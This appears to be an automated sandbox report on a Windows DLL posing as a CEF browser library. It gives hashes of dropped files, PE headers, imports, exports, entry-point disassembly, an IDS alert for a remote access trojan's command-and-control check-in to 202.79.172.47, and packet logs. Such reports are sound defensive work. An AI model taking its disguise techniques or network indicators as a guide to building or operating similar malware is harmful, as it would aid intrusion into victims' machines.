                                    Preview:BMv.......6...(...,...,..... .....@...................*R..d...c...........g...'...g...g...g...g...g...g...g...g...g...i...g...F..L.)Th.{ p.ggr.e c.fno.(beGzunGan #GS .gdeI...C...g....4.A.U...U...U...#5..U...#..FU...#...U...-(..U...-8..U...U...U...#...U...#0..U...#1..U...#6..U..5ach.U..g...g...g...g...g...g...7M..+....R.gg...g......!l...g...g:..g....W..g...g...g...g...g...b...g...b...g...g8..g...g...e.@.g...g...g...g...g...w...'B.......>......g8..?...g...g...g...g...gH......g...g...g...g...g...g...g...g.... ..'...g...g...g.......g...g...g...g...g...g...I|ex........g...g...g...g...g...g...G..`Izda.i..C...g...g...g...g...g...g...'..@Ilat........gx..g...gP..g...g...g...'...Izsr....?...g8..g...g...g...g...g...'..@Izel.k......gH..g...g...g...g...g...'..Bg...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g.
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
                                    Category:dropped
                                    Size (bytes):2487
                                    Entropy (8bit):6.795366664823187
                                    Encrypted:false
                                    SSDEEP:48:8BO8xOk10hBJoLiJRw7lsjXml1yB8aUGLMvv9H3zRb2AcHbRz+6uzUb9JY:8Bek10hBGLiJRw7lsjXmlIuaUGLMv1H/
                                    MD5:E226D09E44DBDC501B0C871E2F2CB4FA
                                    SHA1:DBCC363670F9B184075D13C83645408163994F4D
                                    SHA-256:47AA275183E86879406EAB69CDC12CE038447C37AA37D6E391CDDD8BB6CD79EC
                                    SHA-512:B40B42273D7B992EB4A79B2E6653653B662132761DCD88F632F09D24448A94187BA097D592E0356CA49C1A2B0D83ECC01E7BC26F339DEB7407644C3F64198BDE
                                    Malicious:false
                                    Preview:BM.......6...(...z...y..... .........................2.....s.....0.g.S3..\$;.\$..\$..\$..@..H.V0.B..@$.7 ..T.;.....U.....ara......i.)..g...d.Iu...............g...g3.u.;.S.R<.$..g.Ph.O.i.L$0....g.t$W.D$_`.e.N.a....,8.#,Dh...*....g.t$'.D$7`..!..za...#,X.. .DC.P.#,.n.llf.L$....TC .tC(....+.n.K.g..tC .DCHh.6^f.^.......#,8.N...T..<fku1.t...}*....d.+.|f.eu{.|.cku..t...}.....d...|f.etqI..oZ.....g..........j'...g8..1..$.....x S.\$8.D$|.$.g....(P.3,<.#,|..(.._X..C...g.T$#.D$.b@V.x,S.\$8.D$|.$.g....$P.3,<.#,|..$.HG.D._X..C...g.T$#.D$..H,d@ .#,.W.:_.#@8..,..g..DC.P.#,.3U&df.L$ .d.\C*.TC .tC(...6......g..tC .DC@hi..y.b....|$0.L$T..\.1...g..tC0.DChhI.>.....|$@.L$l.$..e...g..tC@.DCphj.._......|$P.$.g..h.(.&....g.t$?..$.......1x...g...'.t$G.D$;`.=.9.~c....,(.#,hhT.0p.d..g....L$`.$.g..P....g.T$#..tnW^3.S..:.DCt8XOb..;,$t`.,.g.......g..$.....p4.>b..;,$t`...g.......gQ3..U.....1_j...3....}..}..[ .$L.....@f..j'`.0g.h.g..W.[..$P;.h.%.g..}o.u..Kd.d.Ch.E.Q0_P.4,..h...g..}o..E..p..K\..@...u..H
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
                                    Category:dropped
                                    Size (bytes):2487
                                    Entropy (8bit):6.791549044495638
                                    Encrypted:false
                                    SSDEEP:48:8BO8xOk10hBJoLiJRw7lsjXml1yB8aUGLMvv9H3zRb2AcHbRzG6DazUo93OY:8Bek10hBGLiJRw7lsjXmlIuaUGLMv1Hz
                                    MD5:5A4C77C94D7F36D5A95C65C1196E0D2E
                                    SHA1:4339BF1CFB517246746E2DF78E52F6857B743038
                                    SHA-256:C1933665CC4D1E5E04614D5E8D915DE4C92B3C6F3946BE88951727F0F206829E
                                    SHA-512:577C2DCDE13A34EE1E727869B182DDDF540CDCBCE797E0DB0BEAA8A6CA39CDB48EB81D3F58A915670DAD2AEE72E8A90422DE573CBFE97B724246A8911CBE9F69
                                    Malicious:false
                                    Preview:BM.......6...(...z...y..... .........................2.....s.....0.g.S3..\$;.\$..\$..\$..@..H.V0.B..@$.7 ..T.;.....U.....ara......i.)..g...d.Iu...............g...g3.u.;.S.R<.$..g.Ph.O.i.L$0....g.t$W.D$_`.e.N.a....,8.#,Dh...*....g.t$'.D$7`..!..za...#,X.. .DC.P.#,.n.llf.L$....TC .tC(....+.n.K.g..tC .DCHh.6^f.^.......#,8.N...T..<fku1.t...}*....d.+.|f.eu{.|.cku..t...}.....d...|f.etqI..oZ.....g..........j'...g8..1..$.....x S.\$8.D$|.$.g....(P.3,<.#,|..(.._X..C...g.T$#.D$.b@V.x,S.\$8.D$|.$.g....$P.3,<.#,|..$.HG.D._X..C...g.T$#.D$..H,d@ .#,.W.:_.#@8..,..g..DC.P.#,.3U&df.L$ .d.\C*.TC .tC(...6......g..tC .DC@hi..y.b....|$0.L$T..\.1...g..tC0.DChhI.>.....|$@.L$l.$..e...g..tC@.DCphj.._......|$P.$.g..h.(.&....g.t$?..$.......1x...g...'.t$G.D$;`.=.9.~c....,(.#,hhT.0p.d..g....L$`.$.g..P....g.T$#..tnW^3.S..:.DCt8XOb..;,$t`.,.g.......g..$.....p4.>b..;,$t`...g.......gQ3..U.....1_j...3....}..}..[ .$L.....@f..j'`.0g.h.g..W.[..$P;.h.%.g..}o.u..Kd.d.Ch.E.Q0_P.4,..h...g..}o..E..p..K\..@...u..H
                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.444480250430704
                                    TrID:
                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                    • DOS Executable Generic (2002/1) 0.20%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:0Gs0WEGB1E.dll
                                    File size:136'192 bytes
                                    MD5:df0da14a75d792b85065bfabaaa38ca8
                                    SHA1:242c2c510fab747f0d1ba8913adc500bab86e73e
                                    SHA256:654f700f4315594fcd4297cbe4a793aa6487ae5060707164f47d6fc9735662cb
                                    SHA512:f87bf533ed8d43f58dcc4f7931eee3bbbea5c682862bec9b76568e7b11eaa9a971a7a72214d8c494bbf50a19f19cbb2df7df7d3f72437e67a2856f9dfc4cedfa
                                    SSDEEP:3072:B3fO20ODW+x/9A4w0c5IVYBVg9ljZy/5/:BvOAm7fIeBVyljZyx/
                                    TLSH:DDD39C2A3250C035C177953E6869A7B20EBFB822467E0147B7580A6DAF712C4DF3E70B
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V<...].V.].V.].V}+bV.].V}+VVx].V..oV.].V}+WV<].V.%.V.].V.%oV.].V.].V.].V}+SV.].V}+gV.].V}+aV.].VRich.].V................PE..L..
                                    Icon Hash:7ae282899bbab082
                                    Entrypoint:0x1000c1a4
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x10000000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x671E6559 [Sun Oct 27 16:07:53 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:02265d4855d6a2a048af001cf15e813d
                                    Instruction
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    cmp dword ptr [ebp+0Ch], 01h
                                    jne 00007FB2B0CA7667h
                                    call 00007FB2B0CAB9FDh
                                    push dword ptr [ebp+08h]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edx, dword ptr [ebp+0Ch]
                                    call 00007FB2B0CA7551h
                                    pop ecx
                                    pop ebp
                                    retn 000Ch
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 20h
                                    mov eax, dword ptr [ebp+08h]
                                    push esi
                                    push edi
                                    push 00000008h
                                    pop ecx
                                    mov esi, 100185F0h
                                    lea edi, dword ptr [ebp-20h]
                                    rep movsd
                                    mov dword ptr [ebp-08h], eax
                                    mov eax, dword ptr [ebp+0Ch]
                                    pop edi
                                    mov dword ptr [ebp-04h], eax
                                    pop esi
                                    test eax, eax
                                    je 00007FB2B0CA766Eh
                                    test byte ptr [eax], 00000008h
                                    je 00007FB2B0CA7669h
                                    mov dword ptr [ebp-0Ch], 01994000h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    push dword ptr [ebp-10h]
                                    push dword ptr [ebp-1Ch]
                                    push dword ptr [ebp-20h]
                                    call dword ptr [10018164h]
                                    leave
                                    retn 0008h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 18h
                                    push ebx
                                    mov ebx, dword ptr [ebp+0Ch]
                                    push esi
                                    mov esi, dword ptr [ebx+08h]
                                    xor esi, dword ptr [100200B0h]
                                    push edi
                                    mov eax, dword ptr [esi]
                                    mov byte ptr [ebp-01h], 00000000h
                                    mov dword ptr [ebp-0Ch], 00000001h
                                    lea edi, dword ptr [ebx+10h]
                                    cmp eax, FFFFFFFEh
                                    je 00007FB2B0CA766Fh
                                    mov ecx, dword ptr [esi+04h]
                                    add ecx, edi
                                    xor ecx, dword ptr [eax+edi]
                                    call 00007FB2B0CA5DDDh
                                    mov ecx, dword ptr [esi+0Ch]
                                    mov eax, dword ptr [esi+08h]
                                    add ecx, edi
                                    xor ecx, dword ptr [eax+edi]
                                    call 00007FB2B0CA5DCDh
                                    mov eax, dword ptr [ebp+08h]
                                    Programming Language:
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [IMP] VS2008 build 21022
                                    • [C++] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [EXP] VS2010 build 30319
                                    • [LNK] VS2010 build 30319
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x1e6800x141b.rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1da600xc8.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000x1314.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ce500x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x180000x22c.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x160800x16200896966993b9dca6906f339b7649e6291False0.5698380120056498data6.638915335628102IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x180000x7a9b0x7c004bc60c843676bfe0868e727ff8dd4d03False0.39018397177419356data5.340636076181367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x200000x30400x12007c79f953e9c8dd2021568e7063733c45False0.3391927083333333data3.7361216093039817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .reloc0x240000x1fc60x20003511d3bef91282d35343e5fdc365513bFalse0.5023193359375data4.825808214691758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    DLLImport
                                    KERNEL32.dllMultiByteToWideChar, FlushFileBuffers, GetLastError, GetProcAddress, SetFileAttributesA, DefineDosDeviceA, LoadLibraryA, Process32FirstW, GetModuleFileNameA, Process32NextW, lstrcmpiW, CreateToolhelp32Snapshot, CloseHandle, SetFilePointer, SystemTimeToFileTime, SetFileTime, CreateDirectoryA, GetCurrentDirectoryA, LocalFileTimeToFileTime, ReadFile, UnmapViewOfFile, GetTickCount, OutputDebugStringA, HeapDestroy, HeapCreate, IsProcessorFeaturePresent, CreateFileW, WriteConsoleW, SetStdHandle, HeapReAlloc, GetFileAttributesA, Sleep, OpenProcess, WriteFile, GetCurrentProcess, InterlockedDecrement, GlobalAddAtomA, MoveFileExA, lstrlenA, GetFileSize, CreateFileA, GetStringTypeW, GetConsoleMode, GetConsoleCP, HeapSize, GetCurrentProcessId, SetLastError, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, IsValidCodePage, GetOEMCP, GetACP, InterlockedIncrement, GetCPInfo, QueryPerformanceCounter, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW, GetFileType, SetHandleCount, LCMapStringW, LoadLibraryW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, GetModuleFileNameW, WideCharToMultiByte, LocalFree, HeapFree, HeapAlloc, GetSystemTimeAsFileTime, GetModuleHandleW, ExitProcess, DecodePointer, GetCurrentThreadId, GetCommandLineA, RaiseException, RtlUnwind, EncodePointer, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStdHandle
                                    USER32.dllFindWindowA, wsprintfA, FindWindowExA, MessageBoxA, PostMessageA
                                    ADVAPI32.dllAdjustTokenPrivileges, GetLengthSid, RegOpenKeyExA, RegCreateKeyExA, LookupPrivilegeValueA, SetTokenInformation, RegSetValueExA, OpenProcessToken, RegCloseKey
                                    SHELL32.dllSHGetSpecialFolderPathA
                                    ole32.dllCoCreateInstance, CoInitializeSecurity, CoUninitialize, CoInitializeEx, CoInitialize, CoTaskMemAlloc
                                    OLEAUT32.dllSafeArrayGetUBound, SysFreeString, SafeArrayPutElement, SafeArrayUnaccessData, VariantInit, SafeArrayCreate, SafeArrayAccessData, VariantClear, SafeArrayGetLBound, SysAllocString
                                    mscoree.dllCLRCreateInstance
                                    dbghelp.dllMakeSureDirectoryPathExists
                                    WINHTTP.dllWinHttpReceiveResponse, WinHttpConnect, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpen, WinHttpReadData, WinHttpOpenRequest, WinHttpCrackUrl, WinHttpSendRequest, WinHttpAddRequestHeaders
                                    NameOrdinalAddress
                                    cef_clear_cross_origin_whitelist10x10004958
                                    cef_clear_scheme_handler_factories20x1000496f
                                    cef_command_line_create30x10004986
                                    cef_command_line_get_global40x1000499d
                                    cef_cookie_manager_create_manager50x100049b4
                                    cef_cookie_manager_get_blocking_manager60x100049cb
                                    cef_cookie_manager_get_global_manager70x100049e2
                                    cef_crash_reporting_enabled80x100049f9
                                    cef_create_context_shared90x10004a10
                                    cef_create_directory100x10004a27
                                    cef_create_new_temp_directory110x10004a3e
                                    cef_create_temp_directory_in_directory120x10004a55
                                    cef_create_url130x10004a6c
                                    cef_currently_on140x10004a83
                                    cef_delete_file150x10004a9a
                                    cef_dictionary_value_create160x10004ab1
                                    cef_directory_exists170x10004ac8
                                    cef_display_get_alls180x10004adf
                                    cef_display_get_count190x10004af6
                                    cef_display_get_matching_bounds200x10004b0d
                                    cef_display_get_nearest_point210x10004b24
                                    cef_display_get_primary220x10004b3b
                                    cef_do_message_loop_work230x10004b52
                                    cef_drag_data_create240x10004b69
                                    cef_enable_highdpi_support250x10004b80
                                    cef_end_tracing260x10004b83
                                    cef_execute_java_script_with_user_gesture_for_tests270x10004b9a
                                    cef_execute_process280x10004bb1
                                    cef_force_web_plugin_shutdown290x10004bc8
                                    cef_format_url_for_security_display300x10004bdf
                                    cef_get_current_platform_thread_id310x10004bf6
                                    cef_get_extensions_for_mime_type320x10004c0d
                                    cef_get_geolocation330x10004c24
                                    cef_get_mime_type340x10004c3b
                                    cef_get_min_log_level350x10004c52
                                    cef_get_path360x10004c69
                                    cef_get_temp_directory370x10004c80
                                    cef_image_create380x10004c97
                                    cef_initialize390x10004cae
                                    cef_is_cert_status_error400x10004cc5
                                    cef_is_cert_status_minor_error410x10004cdc
                                    cef_is_web_plugin_unstable420x10004cf3
                                    cef_label_button_create430x10004d0a
                                    cef_launch_process440x10004d21
                                    cef_list_value_create450x10004d38
                                    cef_load_crlsets_file460x10004d4f
                                    cef_log470x10004d66
                                    cef_menu_button_create480x10004d7d
                                    cef_menu_model_create490x10004d94
                                    cef_now_from_system_trace_time500x10004dab
                                    cef_panel_create510x10004dc2
                                    cef_parse_csscolor520x10004dd9
                                    cef_parse_json530x10004df0
                                    cef_parse_jsonand_return_error540x10004e07
                                    cef_parse_url550x10004e1e
                                    cef_post_data_create560x10004e35
                                    cef_post_data_element_create570x10004e4c
                                    cef_post_delayed_task580x10004e63
                                    cef_post_task590x10004e7a
                                    cef_print_settings_create600x10004e91
                                    cef_process_message_create610x10004ea8
                                    cef_quit_message_loop620x10004ebf
                                    cef_refresh_web_plugins630x10004ed6
                                    cef_register_extension640x10004eed
                                    cef_register_scheme_handler_factory650x10004f04
                                    cef_register_web_plugin_crash660x10004f1b
                                    cef_register_widevine_cdm670x10004f32
                                    cef_remove_cross_origin_whitelist_entry680x10004f49
                                    cef_remove_web_plugin_path690x10004f60
                                    cef_request_context_create_context700x10004f77
                                    cef_request_context_get_global_context710x10004f8e
                                    cef_request_create720x10004fa5
                                    cef_response_create730x10004fbc
                                    cef_run_message_loop740x10004fd3
                                    cef_scroll_view_create750x10004fea
                                    cef_server_create760x10005001
                                    cef_set_crash_key_value770x10005018
                                    cef_set_osmodal_loop780x1000502f
                                    cef_shutdown790x10005046
                                    cef_stream_reader_create_for_data800x1000505d
                                    cef_stream_reader_create_for_file810x10005074
                                    cef_stream_reader_create_for_handler820x1000508b
                                    cef_stream_writer_create_for_file830x100050a2
                                    cef_stream_writer_create_for_handler840x100050b9
                                    cef_string_ascii_to_utf16850x100050d0
                                    cef_string_list_alloc860x100050e7
                                    cef_string_list_append870x100050fe
                                    cef_string_list_copy880x10005115
                                    cef_string_list_free890x1000512c
                                    cef_string_list_size900x10005143
                                    cef_string_list_value910x1000515a
                                    cef_string_map_alloc920x10005171
                                    cef_string_map_append930x10005188
                                    cef_string_map_free940x1000519f
                                    cef_string_map_key950x100051b6
                                    cef_string_map_size960x100051cd
                                    cef_string_map_value970x100051e4
                                    cef_string_multimap_alloc980x100051fb
                                    cef_string_multimap_append990x10005212
                                    cef_string_multimap_free1000x10005229
                                    cef_string_multimap_key1010x10005240
                                    cef_string_multimap_size1020x10005257
                                    cef_string_multimap_value1030x1000526e
                                    cef_string_userfree_utf16_free1040x10005285
                                    cef_string_utf16_clear1050x10004b80
                                    cef_string_utf16_cmp1060x1000529c
                                    cef_string_utf16_set1070x100052b3
                                    cef_string_utf16_to_lower1080x100052ca
                                    cef_string_utf16_to_utf81090x100052e1
                                    cef_string_utf8_clear1100x100052f8
                                    cef_string_utf8_to_utf161110x10004b80
                                    cef_string_wide_set1120x1000530f
                                    cef_string_wide_to_utf81130x10005326
                                    cef_task_runner_get_for_current_thread1140x1000533d
                                    cef_task_runner_get_for_thread1150x10005354
                                    cef_textfield_create1160x1000536b
                                    cef_time_delta1170x10005382
                                    cef_time_now1180x10005399
                                    cef_time_to_timet1190x100053b0
                                    cef_unregister_internal_web_plugin1200x100053c7
                                    cef_uridecode1210x100053de
                                    cef_uriencode1220x100053f5
                                    cef_urlrequest_create1230x1000540c
                                    cef_v8context_get_current_context1240x10005423
                                    cef_v8context_get_entered_context1250x1000543a
                                    cef_v8context_in_context1260x10005451
                                    cef_v8stack_trace_get_current1270x10005468
                                    cef_v8value_create_array1280x1000547f
                                    cef_v8value_create_array_buffer1290x10005496
                                    cef_v8value_create_bool1300x100054ad
                                    cef_v8value_create_date1310x100054c4
                                    cef_v8value_create_double1320x100054db
                                    cef_v8value_create_function1330x100054f2
                                    cef_v8value_create_int1340x10005509
                                    cef_v8value_create_null1350x10005520
                                    cef_v8value_create_object1360x10005537
                                    cef_v8value_create_string1370x1000554e
                                    cef_v8value_create_uint1380x10005565
                                    cef_v8value_create_undefined1390x1000557c
                                    cef_value_create1400x10005593
                                    cef_visit_web_plugin_info1410x100055aa
                                    cef_window_create_top_level1420x100055c1
                                    cef_write_json1430x100055d8
                                    cef_zip_directory1440x100055ef
                                    cef_zip_reader_create1450x10005606
                                    create_context_shared1460x1000561d
                                    you1470x10004953
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-27T06:22:45.214141+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449741202.79.172.477259TCP
                                    2024-12-27T06:23:58.057946+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449744202.79.172.477259TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 27, 2024 06:22:09.921171904 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:10.040903091 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:10.040999889 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:10.077848911 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:10.197406054 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.345278025 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.347697020 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.467350960 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681175947 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681236982 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681274891 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681314945 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681372881 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.681384087 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681402922 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.681421041 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681454897 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681477070 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.681489944 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681710005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681761980 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.681765079 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.684730053 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.689654112 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.783349037 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.801114082 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.801151991 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.801234961 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.882575989 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.882632017 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.882699966 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:11.920444012 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.920500040 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:11.920573950 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.002124071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.002161980 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.002240896 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.040080070 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040138006 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040174007 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040208101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040209055 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.040242910 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040277958 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040312052 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040347099 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040400982 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.040400982 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.040419102 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040453911 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040488005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040520906 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040543079 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.040555000 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040564060 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.040590048 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040623903 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040656090 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.040680885 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040716887 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040750980 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040766001 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.040787935 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.040843010 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.083928108 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.084012032 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.084016085 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.087687016 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.087827921 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.087836027 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.095359087 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.095433950 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.095504999 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.122014999 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.122114897 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.122190952 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.125816107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.125946999 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.126048088 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.160526037 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.160559893 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.160682917 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.164129019 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.164252043 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.164314985 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.171791077 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.171897888 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.171960115 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.179436922 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.179514885 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:12.179574966 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:12.184216976 CET8049730104.21.22.88192.168.2.4
